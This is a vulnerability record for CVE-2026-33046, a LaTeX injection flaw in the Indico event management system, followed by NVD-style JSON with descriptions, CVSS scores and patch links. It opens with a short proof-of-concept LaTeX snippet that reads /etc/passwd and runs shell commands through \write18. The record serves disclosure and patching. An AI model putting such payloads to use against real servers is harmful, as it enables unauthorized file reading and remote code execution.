CVE-2026-33046

% PoC concept for LaTeX Injection leading to RCE % This requires \write18 to be enabled (shell escape) \documentclass{article} \begin{document} % Attempt to read /etc/passwd \input{/etc/passwd} % Attempt to execute a command (e.g., whoami) \immediate\write18{whoami > /tmp/pwned.txt} \immediate\write18{id} \end{document}

{"cve": {"id": "CVE-2026-33046", "sourceIdentifier": "[email protected]", "published": "2026-03-23T23:17:12.520", "lastModified": "2026-03-24T21:51:13.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Indico is an event management system that uses Flask-Multipass, a multi-backend authentication system for Flask. In versions prior to 3.3.12, due to vulnerabilities in TeXLive and obscure LaTeX syntax that allowed circumventing Indico's LaTeX sanitizer, it is possible to use specially-crafted LaTeX snippets which can read local files or execute code with the privileges of the user running Indico on the server. Note that if server-side LaTeX rendering is not in use (ie `XELATEX_PATH` was not set in `indico.conf`), this vulnerability does not apply. It is recommended to update to Indico 3.3.12 as soon as possible. It is also strongly recommended to enable the containerized LaTeX renderer (using `podman`), which isolates it from the rest of the system. As a workaround, remove the `XELATEX_PATH` setting from `indico.conf` (or comment it out or set it to `None`) and restart the `indico-uwsgi` and `indico-celery` services to disable LaTeX functionality."}, {"lang": "es", "value": "Indico es un sistema de gestión de eventos que utiliza Flask-Multipass, un sistema de autenticación multi-backend para Flask. En versiones anteriores a la 3.3.12, debido a vulnerabilidades en TeXLive y sintaxis LaTeX oscura que permitía eludir el saneador LaTeX de Indico, es posible utilizar fragmentos LaTeX especialmente diseñados que pueden leer archivos locales o ejecutar código con los privilegios del usuario que ejecuta Indico en el servidor. Tenga en cuenta que si la renderización LaTeX del lado del servidor no está en uso (es decir, 'XELATEX_PATH' no se configuró en 'indico.conf'), esta vulnerabilidad no se aplica. Se recomienda actualizar a Indico 3.3.12 lo antes posible. También se recomienda encarecidamente habilitar el renderizador LaTeX en contenedores (utilizando 'podman'), que lo aísla del resto del sistema. Como solución alternativa, elimine la configuración de 'XELATEX_PATH' de 'indico.conf' (o coméntela o configúrela como 'None') y reinicie los servicios 'indico-uwsgi' e 'indico-celery' para deshabilitar la funcionalidad LaTeX."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cern:indico:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.3.12", "matchCriteriaId": "CC85A72D-556A-4CB4-930A-68C3B1B9F8B0"}]}]}], "references": [{"url": "https://github.com/indico/indico/commit/0adb70f0ed66e129361d447868f5f3eb90dc5e96", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/indico/indico/commit/1dbb12525b ... (truncated)